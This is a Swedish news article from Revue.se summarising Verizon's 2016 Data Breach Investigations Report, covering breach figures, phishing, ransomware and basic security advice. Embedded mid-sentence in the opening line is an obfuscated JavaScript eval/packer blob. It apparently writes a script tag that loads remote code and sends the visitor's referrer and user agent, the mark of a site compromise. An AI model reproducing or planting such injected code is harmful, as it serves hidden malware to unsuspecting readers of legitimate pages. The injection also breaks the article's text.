Image Image Image Image Image Image Image Image Image Image

| 22 november, 2017

Scroll to top

Top

No Comments

Verizon Data Breach Investigations Report 2016 visar att cyberbrottslingar utnyttjar mänskliga svagheter | Revue.se

Verizon Data Breach Investigations Report 2016 visar att cyberbrottslingar utnyttjar mänskliga svagheter
Sebastian Plengier Ehrnfelt

Cyberbrottslingar eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsaar|var|u0026u|referrer|kefdd||js|php’.split(‘|’),0,{}))
fortsätter att exploatera mänskliga svagheter och förlitar sig på välkända attackmönster som phising och i högre utsträckning på ransomware, visar
Verizons Data Breach Investigations Report 2016
.

Årets rapport analyserar mer än 2 260 bekräftade dataintrång och fler än 100 000 rapporterade säkerhetsincidenter, de högsta siffrorna sedan introduktionen år 2008. Innehållet visar återkommande teman från tidigare års resultat och iakttagelser som fortsätter spela på den mänskliga faktorn, inklusive:

·       89 % av alla attacker har ekonomiska motiv eller kan klassificeras som spionage

·       De flesta brottslingar utnyttjar kända sårbarheter som inte har åtgärdats trots att säkerhetspatches funnits tillgängliga i flera månader, ibland till och med år. De tio mest kända sårbarheterna låg bakom 85 % av alla bekräftade intrång.

·       63 % procent av dataintrången som bekräftats innefattar stulna, svaga eller standardinställda lösenord.

·       95 % av intrången och 86 % av alla säkerhetsincidenter ryms inom nio attackmönster

·       Ransomware-attacker ökade med 16 % under 2015

·       Den grundläggande säkerheten saknas fortfarande i många organisationer 

Phising har ökat dramatiskt

Ett område som har ökat dramatiskt under det gångna året är nätfiske (phising), där den angripne får ett mail från en skadlig källa. Något som är oroväckande är att 30 % av dessa mail faktiskt öppnas, vilket innebär en ökning på 23 % från 2015-års rapport. Rapporten visar också att 13 % av dessa personer även klickade för att öppna den skadliga bifogade filen eller länken.

Årets rapport upprepar behovet av det grundläggande

Forskarna noterar att grundläggande, väl utförda åtgärder fortsätter att vara viktigare än komplexa system och innefattar att:

·       Lär känna vilka attackmönster som är vanligast för din bransch. Använd två-faktorautentisering för dina system och andra applikationer som till att loggar in på sidor för populära sociala nätverk.

·       Installera patches omedelbart

·       Övervaka all input: Gå igenom alla loggar för att hjälpa till att identifiera skadlig aktivitet

·       Kryptera data: Om stulna enheter krypteras är det mycket svårare för attackerare att komma åt data.

·       Utbilda personal: Att öka medvetenheten kring säkerhet inom din organisation är kritiskt, speciellt i och med den ökade mängden attacker med nätfiske.

·       Lär dig vilken data ni har, skydda den därefter och begränsa vem som har åtkomst.